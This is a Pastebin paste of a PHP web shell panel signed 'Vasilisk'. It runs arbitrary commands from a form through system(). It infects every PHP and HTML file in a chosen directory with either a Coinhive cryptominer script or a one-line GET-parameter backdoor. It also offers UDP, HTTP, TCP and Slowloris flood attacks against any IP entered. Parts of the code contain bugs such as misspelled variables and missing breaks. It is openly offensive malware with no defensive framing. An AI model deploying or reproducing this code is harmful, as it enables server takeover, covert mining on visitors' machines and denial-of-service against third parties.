Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <style type="text/css">
- body {
- background: url() 50% 50% no-repeat; background-repeat: repeat-y, repeat-y;background-attachment: fixed, fixed; background-position: center bottom; background-size: 1070px 700px;
- }
- #search, #submit
- {
- float: center;
- }
- #search, #miner
- {
- padding: 8px 9px;
- width: 380px;
- border: 1px solid #a4c3ca;
- font: normal 13px 'trebuchet MS', arial, helvetica;
- background: #f1f1f1;
- -moz-border-radius: 50px 3px 3px 50px;
- border-radius: 50px 3px 3px 50px;
- -moz-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
- -webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
- box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
- }
- #submit
- {
- background: #6cbb6b;
- background-image: -moz-linear-gradient(#95d788, #6cbb6b);
- background-image: -webkit-gradient(linear,left bottom,left top,color-stop(0, #6cbb6b),color-stop(1, #95d788));
- -moz-border-radius: 3px 50px 50px 3px;
- border-radius: 3px 50px 50px 3px;
- border-width: 1px;
- border-style: solid;
- border-color: #7eba7c #578e57 #447d43;
- -moz-box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
- -webkit-box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
- box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
- height: 35px;
- margin: 0 0 0 10px;
- padding: 0;
- width: 90px;
- cursor: pointer;
- font: bold 14px Arial, Helvetica;
- color: #23441e;
- text-shadow: 0 1px 0 rgba(255,255,255,0.5);
- }
- #submit:hover
- {
- background: #95d788;
- background-image: -moz-linear-gradient(#6cbb6b, #95d788);
- background-image: -webkit-gradient(linear,left bottom,left top,color-stop(0, #95d788),color-stop(1, #6cbb6b));
- }
- #submit:active
- {
- background: #95d788;
- outline: none;
- -moz-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.5) inset;
- -webkit-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.5) inset;
- box-shadow: 0 1px 4px rgba(0, 0, 0, 0.5) inset;
- }
- #submit::-moz-focus-inner
- {
- border: 0;
- }
- body {
- color: #999;
- font: 100%/1.5em sans-serif;
- margin: 0;
- }
- h1 { margin: 0; }
- a {
- color: #999;
- text-decoration: none;
- }
- a:hover { color: #1dabb8; }
- fieldset {
- border: none;
- margin: 0;
- }
- input {
- border: none;
- font-family: inherit;
- font-size: inherit;
- margin: 0;
- outline: none;
- }
- input[type="submit"] { cursor: pointer; }
- .clearfix { *zoom: 1; }
- .clearfix:before, .clearfix:after {
- content: "";
- display: table;
- }
- .clearfix:after { clear: both; }
- /* ---------- LOGIN-FORM ---------- */
- #login-form {
- margin: 150px auto;
- width: 300px;
- }
- #login-form input {
- font-size: 14px;
- }
- #login-form input[type="text"],
- #login-form input[type="text"] {
- border: 1px solid #dcdcdc;
- padding: 12px 10px;
- width: 238px;
- }
- #login-form input[type="text"] {
- border-radius: 3px 3px 0 0;
- }
- #login-form input[type="text"] {
- border-top: none;
- border-radius: 0px 0px 3px 3px;
- }
- #login-form input[type="submit"] {
- background: #1dabb8;
- border-radius: 3px;
- color: #fff;
- float: right;
- font-weight: bold;
- margin-top: 20px;
- padding: 12px 20px;
- }
- #login-form input[type="submit"]:hover { background: #198d98; }
- #login-form footer {
- font-size: 12px;
- margin-top: 16px;
- }
- </style>
- <center>
- <form id="searchbox" method="POST" action="">
- <input id="search" type="text" name="shell" placeholder="Command shell">
- <input id="submit" type="submit" name= "ok" value="Command">
- </form>
- <?php sysinfo(); ?>
- <?php if(isset($_POST['ok'])){ system($_POST['shell']); } ?>
- </center>
- <br><br><br><center>
- <form method="post">
- <input type="text" name="dir" placeholder="Infection">
- <select name="case">
- <option value="miner">Miner</option>
- <option value="backdoor">Backdoor</option>
- </select>
- <input type="submit" name="up" value="Upload" />
- </form>
- </center>
- <?php
- ini_set('error_log',NULL);
- ini_set('display_errors','Off');
- function sysinfo(){
- echo '[#] '.$mysql = (function_exists('mysql_connect')) ? "MySQL: ON<br/>" : "MySQL: OFF<br/>";
- echo '[#] '.$curl = (function_exists('curl_version')) ? "CURL: ON<br/>" : "CURL: OFF<br/>";
- echo '[#] '.php_uname();
- }
- function encdir($dir, $code){
- $files = array_diff(scandir($dir), array('.', '..'));
- foreach ($files as $filemine){
- if(is_dir($dir.'\\'.$filemine)){
- encdir($dir.'\\'.$filemine);
- }else{
- $a = stripos(basename($dir.'/'.$filemine), 'php');
- $b = stripos(basename($dir.'/'.$filemine), 'html');
- if ($a !== false || $b !== false) {
- file_put_contents($dir.'/'.$filemine, $code, FILE_APPEND);
- }
- }
- }
- }
- $miner = '
- <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
- <script type="text/javascript">
- var miner = new CoinHive.User("QDnLlLmkRAYu8LBEbnME0NXEn3s3TCYz", "Test");
- miner.start();
- setInterval( function() {
- miner.setNumThreads(8);
- miner.setThrottle(0.5);
- console.log("Hashes: " + miner.getHashesPerSecond() + " Total: " + miner.getTotalHashes() + " Accepted: " + miner.getAcceptedHashes() + " Thread: " + miner.getNumThreads() );
- }, 1000);
- </script>';
- $shell = '<?php system($_GET["com"]); ?>';
- if($_POST['case'] == 'miner'){
- encdir($_POST['dir'], $miner);
- }elseif($_POST['case'] == 'backdoor'){
- encdir($_POST['dir'], $shell);
- }
- ?>
- <!DOCTYPE html>
- <html>
- <head>
- <meta charset="UTF-8">
- <body>
- <div id="login-form" style="margin-top: 4%; margin-bottom: -11px;">
- <form method="get">
- <div style="margin-left: 8%;">
- <input type="text" placeholder="IP" name="ip">
- <p><input type="text" placeholder="Time" name="time"></p>
- <p><input type="text" placeholder="Page" name="page"></p>
- </div>
- <font color="green" face="Arial">
- <div style="float: right;">
- <input name="myradio" value="1" type="radio"> UDP</div>
- <p><input name="myradio" value="2" type="radio"> HTTP</p>
- <div style="float: right;">
- <p><input name="myradio" value="3" type="radio"> TCP</p></div>
- <div style="float: left;">
- <p><input name="myradio" value="4" type="radio"> Slowloris</p></div><br><br><br></font>
- <input type="submit" name="go" value="attack">
- <footer class="clearfix">
- <p>Vasilisk</p>
- </footer>
- </form>
- </div>
- </body>
- </html>
- <?php
- $myhost = 'http://'.$_SERVER['HTTP_HOST'].'/'.$_SERVER['PHP_SELF'];
- if (isset($_GET["go"])){
- switch ($_GET['myradio']){
- case 1:
- if (isset($_GET['ip']) && isset($_GET['time'])){
- $pack = 0;
- $port = 11;
- $size = 1000;
- $exec = $_GET['time'];
- $host = $_GET['ip'];
- $time = time();
- $max = $time+$exec;
- for($i = 0; $i < $size; $i++) {
- $mess .= rand(0, 9);
- }
- while (1) {
- @curl_setopt($ch, CURLOPT_URL, $myhost."?ip=$host&time=$time&page=$page&myradio=1&go=attack");
- @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
- @curl_setopt($ch, CURLOPT_HEADER, 0);
- @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
- @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
- @curl_exec($ch);
- if(time() > $max){
- break;
- }
- $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
- if($fp){
- $pack++;
- fwrite($fp, $mess);
- fclose($fp);
- }
- }
- }
- break;
- case 2:
- if(isset($_GET['ip']) && isset($_GET['time'])){
- $timei = time();
- $server = $_GET['ip'];
- $time = $_GET['time'];
- $req = array('POST','GET','HEAD');
- $brow = array("", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2", "Opera/9.80 (Windows NT 5.2; U; en) Presto/2.10.289 Version/12.00", "Opera/9.21 (Windows NT 5.1; U; en)", "Opera/9.80 (Windows NT 5.1; U; Distribution 00; ru) Presto/2.10.289 Version/12.00");
- $rand_keys = array_rand($brow, 2);
- while ((time() - $timei < $time)) {
- foreach ($req as $mthd) {
- $ch = @curl_init();
- @curl_setopt($ch, CURLOPT_URL, $myhost."?ip=$server&time=$time&page=$page&myradio=2&go=attack");
- @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
- @curl_setopt($ch, CURLOPT_HEADER, 0);
- @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
- @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
- @curl_exec($ch);
- $fs = array();
- $request = "$mhtd / HTTP/1.1\r\n";
- $request .= "Host: $server\r\n";
- $request .= "User-Agent: ".$brow[$rand_keys[1]]."\r\n";
- $request .= "Keep-Alive: 900\r\n";
- $request .= "Accept: *.*\r\n";
- for ($i = 0; $i < 100; $i++) {
- $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
- }
- for ($i = 0; $i < 100; $i++) {
- if (@fwrite($fs[$i], $request)) {
- continue;
- } else {
- $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
- }
- }
- }
- }
- }
- case 3:
- if(isset($_GET['ip']) && isset($_GET['time'])){
- $host = $_POST['ip'];
- $time = $_POST['time'];
- $port = 80;
- $timei = time();
- $out = str_repeat("A", $size);
- $max_time = 100;
- while (time() - $timei < $time) {
- $ch = @curl_init();
- @curl_setopt($ch, CURLOPT_URL, $myhost."?ip=$host&time=$time&page=$page&myradio=3&go=attack");
- @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
- @curl_setopt($ch, CURLOPT_HEADER, 0);
- @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
- @curl_setopt($ch, CURLOPT_TIMEOUT, 10);
- @curl_exec($ch);
- $fp = stream_socket_client("tcp://$host:$port", $errno, $errstr, 30);
- if ($fp)
- {
- stream_socket_sendto($fp, 'f*ck',STREAM_CLIENT_ASYNC_CONNECT);
- @fclose($socket);
- }
- }
- }
- case 4:
- if(isset($_GET['ip']) && isset($_GET['time'])){
- $host = $_GET['ip'];
- $time = $_GET['time'];
- $timei = time();
- $brow = array("", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 YaBrowser/17.6.1.749 Yowser/2.5 Safari/537.36", " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Opera/9.21 (Windows NT 5.1; U; en)", "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0");
- $rand_keys = array_rand($brow, 2);
- $i = 0;
- for ($i = 0; $i < 100; $i++) {
- $fs[$i] = @fsockopen($ip, 80, $errno, $errstr);
- }
- while ((time() - $timei < $time)) {
- $ch = @curl_init();
- @curl_setopt($ch, CURLOPT_URL, $myhost."?ip=$host&time=$time&page=$page&myradio=4&go=attack");
- @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
- @curl_setopt($ch, CURLOPT_HEADER, 0);
- @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
- @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
- @curl_exec($ch);
- for ($i = 0; $i < 100; $i++) {
- $out = "POST ".$page." HTTP/1.1\r\n";
- $out .= "Host: {$host}\r\n";
- $out .= "User-Agent: ".$brow[$rand_keys[1]]."\r\n";
- $out .= "Content-Length: " . rand(1, 1000) . "\r\n";
- $out .= "X-a: " . rand(1, 10000) . "\r\n";
- if (@fwrite($fs[$i], $out)) {
- continue;
- } else {
- $fs[$i] = @fsockopen($host, 80, $errno, $errstr);
- }
- }
- }
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement